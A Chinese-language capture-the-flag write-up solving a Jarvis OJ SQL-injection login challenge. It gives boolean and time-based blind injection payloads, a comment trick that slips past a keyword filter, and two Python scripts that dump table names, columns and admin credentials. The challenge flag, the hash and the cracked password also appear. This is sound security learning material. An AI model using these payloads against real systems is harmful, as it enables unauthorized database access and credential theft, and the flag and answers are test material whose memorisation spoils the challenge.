CTF{s1mpl3_1nJ3ction_very_easy!!}
描述:
很简单的注入,大家试试?http://web.jarvisoj.com:32787/
分析:
- 输入admin和123,提示密码错误。输入admin'和123,提示用户名错误。输入admin'#提示密码错误,输入username='|| 1#也提示密码错误。nice!确定了注入点!
- 中间走了下弯路走到时间盲注去了(),做得好慢(主要电脑不行),我们先来过正常的解题思路。
基于布尔型SQL盲注,即在SQL注入过程中,应用程序仅仅返回True(密码错误)和False(用户名错误)。
username='|| ascii(substr(database(),1,1))>1#密码错误
username='|| ascii(substr((/*!select*/ database()) ,1,1))>1 #密码错误
username='|| ascii(substr((/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database()),1,1))>1 #密码错误
好了可以开始代码跑了,跑出来表是admin,列是id,username,password,password值是334cfb59c9d74849801d5acdcfdaadc3,MD5在线解出来是eTAloCrEP……过分了! - 错误的心路历程也要走完它!username='|| sleep(5)#,发现是可以睡的
(顺便存一个username=admin'|sleep(10)|',也是可以执行的。防止下次or被过滤,多条payload多条路()) !
于是应该是基于时间的盲注了(并不是),开始找过滤方式:
username='|| if(2>1,sleep(5),0)#睡
username='|| if(ascii('a')>1,sleep(5),0)#睡
username='|| if(ascii(substring(database(),1,1))>1,sleep(5),0)#是有多能睡()
username='|| if(ascii(substring( (/*!select*/ database() ) ,1,1))>1,sleep(5),0)#发现过滤了select,用/!select/绕过
username='|| if(ascii(substring( (/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database() ) ,1,1))>1,sleep(5),0)#接着把关键词用/!/绕过
接下来就都来到令人愉悦的写代码环节,两种一起放一下,记住手动在payload里改data123.
def timeSql():#时间盲注
import requests,time
s = requests.Session()
url = 'http://web.jarvisoj.com:32787/login.php'
database = ''
for i in range(1,20):
for x in range(32,128):
data1 = 'ascii(substr((/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database()),%s,1))<= %s'%(i,x)
data2 = 'ascii(substr((/*!select*/ group_concat(column_name) /*!from*/ information_schema.columns /*!where*/ table_schema=database()),%s,1))<=%s'%(i,x) #跑列名
data3 = 'ascii(substr((/*!select*/ group_concat(id,username,password) /*!from*/ admin),%s,1))<=%s'%(i,x) #dump值
payload={'username':"'|| if(%s,sleep(2),0)# "%(data3),'password':''}
#print (chr(x),payload)
t1 = time.time()
result= s.post(url,payload)
if time.time()-t1 > 2:
database += chr(x)
break
print(i,database)
def boolSql():#二分法布尔盲注
import requests
s = requests.Session()
url = 'http://web.jarvisoj.com:32787/login.php'
database = ''
for i in range(1,50):
toe = 31
head = 128
while head >= toe:
mid =(toe + head) // 2
data1 = 'ascii(substr((/*!select*/ group_concat(table_name) /*!from*/ information_schema.tables /*!where*/ table_schema=database()),%s,1))>=%s'%(i,mid) #跑表名
data2 = 'ascii(substr((/*!select*/ group_concat(column_name) /*!from*/ information_schema.columns /*!where*/ table_schema=database()),%s,1))>=%s'%(i,mid) #跑列名
data3 = 'ascii(substr((/*!select*/ group_concat(id,username,password) /*!from*/ admin),%s,1))>=%s'%(i,mid) #dump值
payload={'username':"'|| %s #"%(data3),'password':''}#跑的时候手动改改data123
#print (payload)
result= s.post(url,payload).text.split('<a class="close" data-dismiss="alert">×</a><strong>')[1][:5]
#print(head,toe,mid,result)
if '用户名错误' in result:
head = mid
elif head - toe > 1:
toe = mid
else: break
database += chr(mid)
print(i,database)
- 最后输入admin,eTAloCrEP,登录拿到flag。
总结
- 二分法真的能拯救辣鸡电脑!
- 如非必要不要尝试基于时间盲注好吗?又要sleep又不能二分的!答应我!
